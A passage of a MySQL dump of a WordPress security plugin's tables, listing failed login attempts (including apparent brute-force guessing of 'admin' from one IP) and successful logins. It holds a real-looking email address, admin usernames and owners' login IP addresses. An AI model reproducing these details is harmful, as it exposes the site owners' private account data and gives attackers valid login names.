21:09:02','139.59.174.7'),(144,0,'ashbyresorthotmail.com','2018-03-21 21:09:03','139.59.174.7'),(145,1,'ashmin','2018-03-21 21:09:04','139.59.174.7'),(146,0,'ashbyresorthotmail.com','2018-03-21 21:09:05','139.59.174.7'),(147,0,'ashbyresorthotmail com','2018-03-21 21:09:05','139.59.174.7'),(148,0,'ashbyresorthotmail.com','2018-03-21 21:09:07','139.59.174.7'),(149,0,'ashbyresorthotmail com','2018-03-21 21:09:08','139.59.174.7'),(150,1,'ashmin','2018-03-21 21:09:09','139.59.174.7'),(151,0,'ashbyresorthotmail com','2018-03-21 21:09:10','139.59.174.7'),(152,1,'ashmin','2018-03-21 21:09:10','139.59.174.7'),(153,0,'ashbyresorthotmail.com','2018-03-21 21:09:11','139.59.174.7'),(154,1,'ashmin','2018-03-21 21:09:12','139.59.174.7'),(155,0,'ashbyresorthotmail.com','2018-03-21 21:09:13','139.59.174.7'),(156,0,'ashbyresorthotmail com','2018-03-21 21:09:13','139.59.174.7'),(157,0,'ashbyresorthotmail.com','2018-03-21 21:09:15','139.59.174.7'),(158,0,'ashbyresorthotmail.com','2018-03-21 21:09:45','139.59.174.7'),(159,0,'ashbyresorthotmail.com','2018-03-21 21:10:45','139.59.174.7'),(160,0,'ashbyresorthotmail com','2018-03-21 21:11:45','139.59.174.7'),(161,1,'ashmin','2018-03-21 21:12:45','139.59.174.7'),(162,1,'ashmin','2018-03-21 21:13:45','139.59.174.7'),(163,1,'ashmin','2018-03-21 21:57:15','66.147.244.174'),(164,0,'admin','2018-03-22 02:49:53','103.240.17.73'),(165,1,'ashmin','2018-03-22 07:35:58','217.160.63.34'),(166,1,'ashmin','2018-03-22 10:07:20','31.211.86.13'),(167,1,'ashmin','2018-03-22 10:07:21','31.211.86.13'),(168,1,'ashmin','2018-03-22 10:07:23','31.211.86.13'),(169,1,'ashmin','2018-03-22 16:19:21','198.46.81.225'),(170,1,'ashmin','2018-03-23 02:56:51','107.180.118.55'),(171,1,'ashmin','2018-03-23 05:17:37','195.22.127.224'),(172,1,'ashmin','2018-03-23 05:17:38','195.22.127.224'),(173,1,'ashmin','2018-03-23 11:13:21','5.9.7.73'),(174,1,'ashmin','2018-03-23 19:52:08','213.121.251.251'),(175,1,'ashmin','2018-03-24 05:25:30','74.208.16.168'),(176,1,'ashmin','2018-03-24 13:37:48','139.162.124.104'),(177,0,'admin','2018-03-24 22:46:46','103.240.17.73'),(178,1,'ashmin','2018-03-25 00:40:09','195.22.127.224'),(179,0,'admin','2018-03-25 09:02:28','87.106.133.138'),(180,0,'admin','2018-03-25 10:51:20','139.59.25.153'),(181,0,'admin','2018-03-25 11:36:45','103.240.17.73'),(182,0,'admin','2018-03-25 16:53:51','87.106.133.138'),(183,0,'admin','2018-03-25 16:57:02','87.106.133.138'),(184,0,'admin','2018-03-25 16:59:49','87.106.133.138'),(185,0,'admin','2018-03-25 17:05:22','87.106.133.138'),(186,0,'admin','2018-03-25 17:08:08','87.106.133.138'),(187,0,'admin','2018-03-25 17:10:52','87.106.133.138'),(188,0,'admin','2018-03-25 17:13:36','87.106.133.138'),(189,0,'admin','2018-03-25 17:16:20','87.106.133.138'),(190,0,'admin','2018-03-25 17:19:03','87.106.133.138'),(191,0,'admin','2018-03-25 17:21:46','87.106.133.138'),(192,0,'admin','2018-03-25 17:24:29','87.106.133.138'),(193,0,'admin','2018-03-25 17:27:14','87.106.133.138'),(194,0,'admin','2018-03-25 17:29:57','87.106.133.138'),(195,0,'admin','2018-03-25 17:32:42','87.106.133.138'),(196,0,'admin','2018-03-25 17:35:25','87.106.133.138'),(197,0,'admin','2018-03-25 17:38:08','87.106.133.138'),(198,0,'admin','2018-03-25 17:40:50','87.106.133.138'),(199,0,'admin','2018-03-25 17:46:14','87.106.133.138'),(200,0,'admin','2018-03-25 17:48:56','87.106.133.138'),(201,0,'admin','2018-03-25 17:51:39','87.106.133.138'),(202,0,'admin','2018-03-25 17:54:27','87.106.133.138'),(203,0,'admin','2018-03-25 17:57:20','87.106.133.138'),(204,0,'admin','2018-03-25 18:00:09','87.106.133.138'),(205,0,'admin','2018-03-25 18:03:04','87.106.133.138'),(206,0,'admin','2018-03-25 18:06:00','87.106.133.138'),(207,0,'admin','2018-03-25 18:08:53','87.106.133.138'),(208,0,'admin','2018-03-25 18:11:43','87.106.133.138'),(209,0,'admin','2018-03-25 18:14:30','87.106.133.138'),(210,0,'admin','2018-03-25 18:17:17','87.106.133.138'),(211,0,'admin','2018-03-25 18:22:48','87.106.133.138'),(212,0,'admin','2018-03-25 18:25:31','87.106.133.138'),(213,0,'admin','2018-03-25 18:31:01','87.106.133.138'),(214,0,'admin','2018-03-25 18:33:45','87.106.133.138'),(215,0,'admin','2018-03-25 18:36:28','87.106.133.138'),(216,0,'admin','2018-03-25 18:39:11','87.106.133.138'),(217,0,'admin','2018-03-25 18:41:55','87.106.133.138'),(218,0,'admin','2018-03-25 18:44:39','87.106.133.138'),(219,0,'admin','2018-03-25 18:47:24','87.106.133.138'),(220,0,'admin','2018-03-25 18:50:07','87.106.133.138'),(221,0,'admin','2018-03-25 18:52:52','87.106.133.138'),(222,0,'admin','2018-03-25 18:55:39','87.106.133.138'),(223,0,'admin','2018-03-25 18:58:27','87.106.133.138'),(224,0,'admin','2018-03-25 19:01:19','87.106.133.138'),(225,0,'admin','2018-03-25 19:04:12','87.106.133.138'),(226,0,'admin','2018-03-25 19:07:04','87.106.133.138'),(227,0,'admin','2018-03-25 19:12:45','87.106.133.138'),(228,0,'admin','2018-03-25 19:15:36','87.106.133.138'),(229,0,'admin','2018-03-25 19:18:27','87.106.133.138'),(230,0,'admin','2018-03-25 19:21:20','87.106.133.138'),(231,0,'admin','2018-03-25 19:24:13','87.106.133.138'),(232,0,'admin','2018-03-25 19:27:05','87.106.133.138'),(233,0,'admin','2018-03-25 19:29:56','87.106.133.138'),(234,0,'admin','2018-03-25 19:32:50','87.106.133.138'),(235,0,'admin','2018-03-25 19:35:42','87.106.133.138'),(236,0,'admin','2018-03-25 19:38:33','87.106.133.138'),(237,0,'admin','2018-03-25 19:41:24','87.106.133.138'),(238,0,'admin','2018-03-25 19:44:13','87.106.133.138'),(239,0,'admin','2018-03-25 19:47:03','87.106.133.138'),(240,0,'admin','2018-03-25 19:49:51','87.106.133.138'),(241,0,'admin','2018-03-25 19:55:30','87.106.133.138'),(242,0,'admin','2018-03-25 19:58:22','87.106.133.138'),(243,0,'admin','2018-03-25 20:01:17','87.106.133.138'),(244,0,'admin','2018-03-25 20:04:17','87.106.133.138'),(245,0,'admin','2018-03-25 20:07:18','87.106.133.138'),(246,0,'admin','2018-03-25 20:10:18','87.106.133.138'),(247,0,'admin','2018-03-25 20:13:16','87.106.133.138'),(248,0,'admin','2018-03-25 20:16:14','87.106.133.138'),(249,0,'admin','2018-03-25 20:19:10','87.106.133.138'),(250,0,'admin','2018-03-25 20:22:07','87.106.133.138'),(251,0,'admin','2018-03-25 20:25:02','87.106.133.138'),(252,0,'admin','2018-03-25 20:27:56','87.106.133.138'),(253,0,'admin','2018-03-25 20:30:51','87.106.133.138'),(254,0,'admin','2018-03-25 20:33:47','87.106.133.138'),(255,0,'admin','2018-03-25 20:39:37','87.106.133.138'),(256,0,'admin','2018-03-25 20:42:32','87.106.133.138'),(257,0,'admin','2018-03-25 20:45:27','87.106.133.138'),(258,0,'admin','2018-03-25 20:48:19','87.106.133.138'),(259,0,'admin','2018-03-25 20:51:11','87.106.133.138'),(260,0,'admin','2018-03-25 20:54:06','87.106.133.138'),(261,0,'admin','2018-03-25 20:57:05','87.106.133.138'),(262,0,'admin','2018-03-25 20:59:58','87.106.133.138'),(263,0,'admin','2018-03-25 21:02:57','87.106.133.138'),(264,0,'admin','2018-03-25 21:05:53','87.106.133.138'),(265,0,'admin','2018-03-25 21:08:48','87.106.133.138'),(266,0,'admin','2018-03-25 21:11:43','87.106.133.138'),(267,0,'admin','2018-03-25 21:14:37','87.106.133.138'),(268,0,'admin','2018-03-25 21:17:27','87.106.133.138'),(269,0,'admin','2018-03-25 21:23:11','87.106.133.138'),(270,0,'admin','2018-03-25 21:26:03','87.106.133.138'),(271,0,'admin','2018-03-25 21:28:54','87.106.133.138'),(272,0,'admin','2018-03-25 21:31:45','87.106.133.138'),(273,0,'admin','2018-03-25 21:34:36','87.106.133.138'),(274,0,'admin','2018-03-25 21:37:26','87.106.133.138'),(275,0,'admin','2018-03-25 21:40:15','87.106.133.138'),(276,0,'admin','2018-03-25 21:43:02','87.106.133.138'),(277,0,'admin','2018-03-25 21:45:51','87.106.133.138'),(278,0,'admin','2018-03-25 21:48:39','87.106.133.138'),(279,0,'admin','2018-03-25 21:51:27','87.106.133.138'),(280,0,'admin','2018-03-25 21:54:17','87.106.133.138'),(281,0,'admin','2018-03-25 21:57:06','87.106.133.138'),(282,0,'admin','2018-03-25 21:59:54','87.106.133.138'),(283,0,'admin','2018-03-25 22:05:41','87.106.133.138'),(284,0,'admin','2018-03-25 22:08:34','87.106.133.138'),(285,0,'admin','2018-03-25 22:11:28','87.106.133.138'),(286,0,'admin','2018-03-25 22:14:20','87.106.133.138'),(287,0,'admin','2018-03-25 22:17:12','87.106.133.138'),(288,0,'admin','2018-03-25 22:20:03','87.106.133.138'),(289,0,'admin','2018-03-25 22:22:56','87.106.133.138'),(290,0,'admin','2018-03-25 22:25:47','87.106.133.138'),(291,0,'admin','2018-03-25 22:28:39','87.106.133.138'),(292,0,'admin','2018-03-25 22:31:31','87.106.133.138'),(293,0,'admin','2018-03-25 22:34:23','87.106.133.138'),(294,0,'admin','2018-03-25 22:37:13','87.106.133.138'),(295,0,'admin','2018-03-25 22:40:04','87.106.133.138'),(296,0,'admin','2018-03-25 22:42:55','87.106.133.138'),(297,0,'admin','2018-03-25 22:48:37','87.106.133.138'),(298,0,'admin','2018-03-25 22:51:27','87.106.133.138'),(299,0,'admin','2018-03-25 22:57:11','87.106.133.138'),(300,0,'admin','2018-03-25 23:00:04','87.106.133.138'),(301,0,'admin','2018-03-25 23:03:03','87.106.133.138'),(302,0,'admin','2018-03-25 23:05:59','87.106.133.138'),(303,0,'admin','2018-03-25 23:08:56','87.106.133.138'),(304,0,'admin','2018-03-25 23:11:50','87.106.133.138'),(305,0,'admin','2018-03-25 23:14:44','87.106.133.138'),(306,0,'admin','2018-03-25 23:17:37','87.106.133.138'),(307,0,'admin','2018-03-25 23:20:31','87.106.133.138'),(308,0,'admin','2018-03-25 23:23:23','87.106.133.138'),(309,0,'admin','2018-03-25 23:26:15','87.106.133.138'),(310,0,'admin','2018-03-25 23:32:00','87.106.133.138'),(311,0,'admin','2018-03-25 23:34:53','87.106.133.138'),(312,0,'admin','2018-03-25 23:37:46','87.106.133.138'),(313,0,'admin','2018-03-25 23:40:38','87.106.133.138'),(314,0,'admin','2018-03-25 23:43:30','87.106.133.138'),(315,0,'admin','2018-03-25 23:46:22','87.106.133.138'),(316,0,'admin','2018-03-25 23:49:14','87.106.133.138'),(317,0,'admin','2018-03-25 23:52:05','87.106.133.138'),(318,0,'admin','2018-03-25 23:53:51','139.59.25.153'),(319,0,'admin','2018-03-25 23:54:57','87.106.133.138'),(320,0,'admin','2018-03-25 23:57:49','87.106.133.138'),(321,0,'admin','2018-03-26 00:00:43','87.106.133.138'),(322,0,'admin','2018-03-26 00:03:40','87.106.133.138'),(323,0,'admin','2018-03-26 00:06:37','87.106.133.138'),(324,0,'admin','2018-03-26 00:09:31','87.106.133.138'),(325,0,'admin','2018-03-26 00:15:22','87.106.133.138'),(326,0,'admin','2018-03-26 00:18:17','87.106.133.138'),(327,0,'admin','2018-03-26 00:21:10','87.106.133.138'),(328,0,'admin','2018-03-26 00:24:04','87.106.133.138'),(329,0,'admin','2018-03-26 00:26:58','87.106.133.138'),(330,0,'admin','2018-03-26 00:29:53','87.106.133.138'),(331,0,'admin','2018-03-26 00:32:49','87.106.133.138'),(332,0,'admin','2018-03-26 00:35:43','87.106.133.138'),(333,0,'admin','2018-03-26 00:38:37','87.106.133.138'),(334,0,'admin','2018-03-26 00:41:30','87.106.133.138'),(335,0,'admin','2018-03-26 00:44:23','87.106.133.138'),(336,0,'admin','2018-03-26 00:47:18','87.106.133.138'),(337,0,'admin','2018-03-26 00:50:12','87.106.133.138'),(338,0,'admin','2018-03-26 00:53:04','87.106.133.138'),(339,0,'admin','2018-03-26 00:58:48','87.106.133.138'),(340,0,'admin','2018-03-26 01:01:45','87.106.133.138'),(341,0,'admin','2018-03-26 01:04:44','87.106.133.138'),(342,0,'admin','2018-03-26 01:07:42','87.106.133.138'),(343,0,'admin','2018-03-26 01:10:38','87.106.133.138'),(344,0,'admin','2018-03-26 01:13:35','87.106.133.138'),(345,0,'admin','2018-03-26 01:16:28','87.106.133.138'),(346,0,'admin','2018-03-26 01:19:23','87.106.133.138'),(347,0,'admin','2018-03-26 01:22:19','87.106.133.138'),(348,0,'admin','2018-03-26 01:25:15','87.106.133.138'),(349,0,'admin','2018-03-26 01:28:10','87.106.133.138'),(350,0,'admin','2018-03-26 01:31:05','87.106.133.138'),(351,0,'admin','2018-03-26 01:34:01','87.106.133.138'),(352,0,'admin','2018-03-26 01:36:57','87.106.133.138'),(353,0,'admin','2018-03-26 01:42:46','87.106.133.138'),(354,0,'admin','2018-03-26 01:45:41','87.106.133.138'),(355,0,'admin','2018-03-26 01:48:35','87.106.133.138'),(356,0,'admin','2018-03-26 01:51:29','87.106.133.138'),(357,0,'admin','2018-03-26 01:54:25','87.106.133.138'),(358,0,'admin','2018-03-26 01:57:22','87.106.133.138'),(359,0,'admin','2018-03-26 02:00:19','87.106.133.138'),(360,0,'admin','2018-03-26 02:03:18','87.106.133.138'),(361,0,'admin','2018-03-26 02:06:17','87.106.133.138'),(362,0,'admin','2018-03-26 02:09:16','87.106.133.138'),(363,0,'admin','2018-03-26 02:12:13','87.106.133.138'),(364,0,'admin','2018-03-26 02:15:13','87.106.133.138'),(365,0,'admin','2018-03-26 02:18:09','87.106.133.138'),(366,0,'admin','2018-03-26 02:21:04','87.106.133.138'),(367,0,'admin','2018-03-26 02:26:59','87.106.133.138'),(368,0,'admin','2018-03-26 02:29:55','87.106.133.138'),(369,0,'admin','2018-03-26 02:32:55','87.106.133.138'),(370,0,'admin','2018-03-26 02:35:54','87.106.133.138'),(371,0,'admin','2018-03-26 02:38:52','87.106.133.138'),(372,0,'admin','2018-03-26 02:41:49','87.106.133.138'),(373,0,'admin','2018-03-26 02:44:45','87.106.133.138'),(374,0,'admin','2018-03-26 02:47:42','87.106.133.138'),(375,0,'admin','2018-03-26 02:50:38','87.106.133.138'),(376,0,'admin','2018-03-26 02:53:32','87.106.133.138'),(377,0,'admin','2018-03-26 02:56:28','87.106.133.138'),(378,0,'admin','2018-03-26 02:59:23','87.106.133.138'),(379,0,'admin','2018-03-26 03:02:22','87.106.133.138'),(380,0,'admin','2018-03-26 03:05:19','87.106.133.138'),(381,0,'admin','2018-03-26 03:11:13','87.106.133.138'),(382,0,'admin','2018-03-26 03:14:11','87.106.133.138'),(383,0,'admin','2018-03-26 03:17:08','87.106.133.138'),(384,0,'admin','2018-03-26 03:20:05','87.106.133.138'),(385,0,'admin','2018-03-26 03:23:03','87.106.133.138'),(386,0,'admin','2018-03-26 03:25:59','87.106.133.138'),(387,0,'admin','2018-03-26 03:28:55','87.106.133.138'),(388,0,'admin','2018-03-26 03:31:52','87.106.133.138'),(389,0,'admin','2018-03-26 03:34:49','87.106.133.138'),(390,0,'admin','2018-03-26 03:37:44','87.106.133.138'),(391,0,'admin','2018-03-26 03:40:39','87.106.133.138'),(392,0,'admin','2018-03-26 03:43:32','87.106.133.138'),(393,0,'admin','2018-03-26 03:46:27','87.106.133.138'),(394,0,'admin','2018-03-26 03:49:22','87.106.133.138'),(395,0,'admin','2018-03-26 03:55:13','87.106.133.138'),(396,0,'admin','2018-03-26 03:58:07','87.106.133.138'),(397,0,'admin','2018-03-26 04:01:05','87.106.133.138'),(398,0,'admin','2018-03-26 04:04:03','87.106.133.138'),(399,0,'admin','2018-03-26 04:07:01','87.106.133.138'),(400,0,'admin','2018-03-26 04:09:59','87.106.133.138'),(401,0,'admin','2018-03-26 04:12:57','87.106.133.138'),(402,0,'admin','2018-03-26 04:15:54','87.106.133.138'),(403,0,'admin','2018-03-26 04:18:52','87.106.133.138'),(404,0,'admin','2018-03-26 04:21:47','87.106.133.138'),(405,0,'admin','2018-03-26 04:24:43','87.106.133.138'),(406,0,'admin','2018-03-26 04:27:40','87.106.133.138'),(407,0,'admin','2018-03-26 04:30:37','87.106.133.138'),(408,0,'admin','2018-03-26 04:33:33','87.106.133.138'),(409,0,'admin','2018-03-26 04:39:25','87.106.133.138'),(410,0,'admin','2018-03-26 04:42:21','87.106.133.138'),(411,0,'admin','2018-03-26 04:45:16','87.106.133.138'),(412,0,'admin','2018-03-26 04:48:13','87.106.133.138'),(413,0,'admin','2018-03-26 04:51:07','87.106.133.138'),(414,0,'admin','2018-03-26 04:54:03','87.106.133.138'),(415,0,'admin','2018-03-26 04:56:58','87.106.133.138'),(416,0,'admin','2018-03-26 04:59:55','87.106.133.138'),(417,0,'admin','2018-03-26 05:03:00','87.106.133.138'),(418,0,'admin','2018-03-26 05:06:04','87.106.133.138'),(419,0,'admin','2018-03-26 05:09:07','87.106.133.138'),(420,0,'admin','2018-03-26 05:12:08','87.106.133.138'),(421,0,'admin','2018-03-26 05:15:10','87.106.133.138'),(422,0,'admin','2018-03-26 05:18:10','87.106.133.138'),(423,0,'admin','2018-03-26 05:24:08','87.106.133.138'),(424,0,'admin','2018-03-26 05:27:10','87.106.133.138'),(425,0,'admin','2018-03-26 05:30:13','87.106.133.138'),(426,0,'admin','2018-03-26 05:33:19','87.106.133.138'),(427,0,'admin','2018-03-26 05:36:22','87.106.133.138'),(428,0,'admin','2018-03-26 05:39:23','87.106.133.138'),(429,0,'admin','2018-03-26 05:42:26','87.106.133.138'),(430,0,'admin','2018-03-26 05:45:28','87.106.133.138'),(431,0,'admin','2018-03-26 05:48:30','87.106.133.138'),(432,0,'admin','2018-03-26 05:51:30','87.106.133.138'),(433,0,'admin','2018-03-26 05:54:31','87.106.133.138'),(434,0,'admin','2018-03-26 05:57:32','87.106.133.138'),(435,0,'admin','2018-03-26 06:00:34','87.106.133.138'),(436,0,'admin','2018-03-26 06:06:44','87.106.133.138'),(437,0,'admin','2018-03-26 06:09:49','87.106.133.138'),(438,0,'admin','2018-03-26 06:12:54','87.106.133.138'),(439,0,'admin','2018-03-26 06:15:59','87.106.133.138'),(440,0,'admin','2018-03-26 06:19:02','87.106.133.138'),(441,0,'admin','2018-03-26 06:22:07','87.106.133.138'),(442,0,'admin','2018-03-26 06:25:09','87.106.133.138'),(443,0,'admin','2018-03-26 06:28:10','87.106.133.138'),(444,0,'admin','2018-03-26 06:29:23','139.59.25.153'),(445,0,'admin','2018-03-26 06:31:13','87.106.133.138'),(446,0,'admin','2018-03-26 06:34:15','87.106.133.138'),(447,0,'admin','2018-03-26 06:37:16','87.106.133.138'),(448,0,'admin','2018-03-26 06:40:17','87.106.133.138'),(449,0,'admin','2018-03-26 06:43:18','87.106.133.138'),(450,0,'admin','2018-03-26 06:49:19','87.106.133.138'),(451,0,'admin','2018-03-26 06:52:18','87.106.133.138'),(452,0,'admin','2018-03-26 06:55:20','87.106.133.138'),(453,0,'admin','2018-03-26 06:58:19','87.106.133.138'),(454,0,'admin','2018-03-26 07:01:21','87.106.133.138'),(455,0,'admin','2018-03-26 07:04:25','87.106.133.138'),(456,0,'admin','2018-03-26 07:07:31','87.106.133.138'),(457,0,'admin','2018-03-26 07:10:35','87.106.133.138'),(458,0,'admin','2018-03-26 07:13:37','87.106.133.138'),(459,0,'admin','2018-03-26 07:16:38','87.106.133.138'),(460,0,'admin','2018-03-26 07:19:41','87.106.133.138'),(461,0,'admin','2018-03-26 07:22:44','87.106.133.138'),(462,0,'admin','2018-03-26 07:25:43','87.106.133.138'),(463,0,'admin','2018-03-26 07:31:45','87.106.133.138'),(464,0,'admin','2018-03-26 07:34:47','87.106.133.138'),(465,0,'admin','2018-03-26 07:37:50','87.106.133.138'),(466,0,'admin','2018-03-26 07:40:50','87.106.133.138'),(467,0,'admin','2018-03-26 07:43:50','87.106.133.138'),(468,0,'admin','2018-03-26 07:46:51','87.106.133.138'),(469,0,'admin','2018-03-26 07:49:50','87.106.133.138'),(470,0,'admin','2018-03-26 07:52:51','87.106.133.138'),(471,0,'admin','2018-03-26 07:55:52','87.106.133.138'),(472,0,'admin','2018-03-26 07:58:53','87.106.133.138'),(473,0,'admin','2018-03-26 08:01:55','87.106.133.138'),(474,0,'admin','2018-03-26 08:04:57','87.106.133.138'),(475,0,'admin','2018-03-26 13:08:21','139.59.25.153'),(476,0,'admin','2018-03-26 19:50:08','139.59.25.153'),(477,0,'admin','2018-03-26 21:13:38','67.227.155.186'),(478,0,'admin','2018-03-27 02:21:06','139.59.25.153'),(479,0,'admin','2018-03-27 04:44:27','66.11.120.65'),(480,0,'admin','2018-03-27 12:08:38','66.11.120.65'),(481,0,'admin','2018-03-27 13:59:08','67.227.155.186'),(482,0,'admin','2018-03-27 14:59:29','139.59.25.153'),(483,0,'admin','2018-03-27 21:42:02','139.59.25.153'),(484,0,'admin','2018-03-28 02:28:18','66.11.120.65'),(485,0,'admin','2018-03-28 04:10:58','139.59.25.153'),(486,1,'ashmin','2018-03-28 08:56:52','91.206.201.201'),(487,1,'ashmin','2018-03-28 17:40:37','101.50.1.17'),(488,0,'admin','2018-03-28 17:46:30','67.227.155.186'),(489,1,'ashmin','2018-03-29 03:00:23','132.148.206.130'),(490,0,'admin','2018-03-29 05:58:24','139.59.25.153'),(491,0,'admin','2018-03-29 05:58:26','66.11.120.65'),(492,1,'ashmin','2018-03-29 10:54:16','91.185.211.81'),(493,0,'admin','2018-03-29 12:28:19','139.59.25.153'),(494,0,'admin','2018-03-29 19:00:22','139.59.25.153'),(495,1,'ashmin','2018-03-29 19:20:40','153.92.0.18'),(496,0,'admin','2018-03-30 01:30:31','139.59.25.153'),(497,0,'ashbyadmin','2018-03-31 14:56:23','47.203.137.20'),(498,1,'ashmin','2018-03-31 15:02:17','172.245.220.50'),(499,1,'ashmin','2018-03-31 15:20:16','47.203.137.20'),(500,1,'ashmin','2018-03-31 15:28:58','47.203.137.20'),(501,2,'ashbyresort@hotmail.com','2018-12-08 12:02:04','64.118.2.70'),(502,2,'ashbyresort@hotmail.com','2018-12-12 14:48:11','64.118.2.70'),(503,0,'dbeneke','2019-04-02 09:59:30','69.165.25.149'),(504,0,'dbeneke','2019-04-02 10:00:06','69.165.25.149'),(505,0,'dbeneke','2019-04-02 10:00:17','69.165.25.149'),(506,0,'dbeneke','2019-04-02 10:01:22','69.165.25.149'),(507,0,'dbeneke','2019-04-02 10:21:12','108.191.165.77'),(508,0,'dbeneke','2019-04-02 10:21:50','108.191.165.77'),(509,2,'ashbyresort@hotmail.com','2019-04-02 10:31:16','108.191.165.77');
/*!40000 ALTER TABLE `ar_aiowps_failed_logins` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `ar_aiowps_global_meta`
--

DROP TABLE IF EXISTS `ar_aiowps_global_meta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `ar_aiowps_global_meta` (
  `meta_id` bigint(20) NOT NULL AUTO_INCREMENT,
  `date_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `meta_key1` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL,
  `meta_key2` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL,
  `meta_key3` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL,
  `meta_key4` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL,
  `meta_key5` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL,
  `meta_value1` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL,
  `meta_value2` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `meta_value3` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `meta_value4` longtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `meta_value5` longtext COLLATE utf8mb4_unicode_ci NOT NULL,
  PRIMARY KEY (`meta_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `ar_aiowps_global_meta`
--

LOCK TABLES `ar_aiowps_global_meta` WRITE;
/*!40000 ALTER TABLE `ar_aiowps_global_meta` DISABLE KEYS */;
/*!40000 ALTER TABLE `ar_aiowps_global_meta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `ar_aiowps_login_activity`
--

DROP TABLE IF EXISTS `ar_aiowps_login_activity`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `ar_aiowps_login_activity` (
  `id` bigint(20) NOT NULL AUTO_INCREMENT,
  `user_id` bigint(20) NOT NULL,
  `user_login` varchar(150) COLLATE utf8mb4_unicode_ci NOT NULL,
  `login_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `logout_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `login_ip` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `login_country` varchar(150) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `browser_type` varchar(150) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=175 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `ar_aiowps_login_activity`
--

LOCK TABLES `ar_aiowps_login_activity` WRITE;
/*!40000 ALTER TABLE `ar_aiowps_login_activity` DISABLE KEYS */;
INSERT INTO `ar_aiowps_login_activity` VALUES (1,1,'ashmin','2016-03-13 19:18:11','0000-00-00 00:00:00','71.101.252.175','',''),(2,1,'ashmin','2016-03-13 19:24:07','0000-00-00 00:00:00','71.101.252.175','',''),(3,1,'ashmin','2016-03-27 15:50:44','0000-00-00 00:00:00','71.101.252.175','',''),(4,2,'ashbyresort@hotmail.com','2016-03-27 18:44:56','0000-00-00 00:00:00','71.101.252.175','',''),(5,1,'ashmin','2016-03-30 19:38:44','0000-00-00 00:00:00','71.101.252.175','',''),(6,1,'ashmin','2016-04-02 18:54:13','0000-00-00 00:00:00','71.101.252.175','',''),(7,1,'ashmin','2016-04-13 20:43:29','0000-00-00 00:00:00','71.101.252.175','',''),(8,1,'ashmin','2016-04-28 19:31:41','0000-00-00 00:00:00','71.101.252.175','',''),(9,1,'ashmin','2016-06-08 20:53:54','0000-00-00 00:00:00','71.101.252.175','',''),(10,1,'ashmin','2016-06-17 20:17:53','0000-00-00 00:00:00','71.100.77.22','',''),(11,1,'ashmin','2016-06-21 09:09:54','0000-00-00 00:00:00','69.165.31.210','',''),(12,1,'ashmin','2016-06-21 09:11:34','0000-00-00 00:00:00','69.165.31.210','',''),(13,2,'ashbyresort@hotmail.com','2016-06-21 09:13:22','0000-00-00 00:00:00','69.165.31.210','',''),(14,1,'ashmin','2016-06-25 20:36:58','0000-00-00 00:00:00','71.100.77.22','',''),(15,2,'ashbyresort@hotmail.com','2016-06-27 19:26:58','0000-00-00 00:00:00','69.165.31.210','',''),(16,2,'ashbyresort@hotmail.com','2016-06-29 19:58:54','0000-00-00 00:00:00','69.165.31.210','',''),(17,1,'ashmin','2016-06-30 19:12:38','0000-00-00 00:00:00','71.100.77.22','',''),(18,1,'ashmin','2016-06-30 20:17:12','0000-00-00 00:00:00','71.100.77.22','',''),(19,1,'ashmin','2016-07-01 19:47:02','0000-00-00 00:00:00','71.100.77.22','',''),(20,2,'ashbyresort@hotmail.com','2016-08-20 07:39:07','0000-00-00 00:00:00','69.165.31.210','',''),(21,2,'ashbyresort@hotmail.com','2016-08-26 12:43:53','0000-00-00 00:00:00','69.165.31.210','',''),(22,2,'ashbyresort@hotmail.com','2016-09-05 08:57:13','0000-00-00 00:00:00','69.165.31.210','',''),(23,2,'ashbyresort@hotmail.com','2016-09-05 09:30:43','0000-00-00 00:00:00','69.165.31.210','',''),(24,2,'ashbyresort@hotmail.com','2016-09-06 09:23:07','0000-00-00 00:00:00','69.165.31.210','',''),(25,2,'ashbyresort@hotmail.com','2016-09-06 12:38:25','0000-00-00 00:00:00','69.165.31.210','',''),(26,1,'ashmin','2016-12-03 19:45:38','2018-03-31 15:07:59','47.203.137.20','',''),(27,1,'ashmin','2017-01-17 19:24:27','2018-03-31 15:07:59','47.203.137.20','',''),(28,1,'ashmin','2017-01-18 18:38:04','2018-03-31 15:07:59','47.203.137.20','',''),(29,2,'ashbyresort@hotmail.com','2017-01-20 11:06:39','0000-00-00 00:00:00','69.165.31.210','',''),(30,2,'ashbyresort@hotmail.com','2017-01-22 11:05:22','0000-00-00 00:00:00','69.165.31.210','',''),(31,2,'ashbyresort@hotmail.com','2017-01-22 14:20:56','0000-00-00 00:00:00','69.165.31.210','',''),(32,1,'ashmin','2017-01-23 18:51:47','2018-03-31 15:07:59','47.203.137.20','',''),(33,2,'ashbyresort@hotmail.com','2017-01-23 18:59:06','0000-00-00 00:00:00','69.165.31.210','',''),(34,2,'ashbyresort@hotmail.com','2017-01-25 13:56:10','0000-00-00 00:00:00','69.165.31.210','',''),(35,1,'ashmin','2017-02-05 20:11:24','2018-03-31 15:07:59','47.203.137.20','',''),(36,2,'ashbyresort@hotmail.com','2017-02-14 09:28:16','0000-00-00 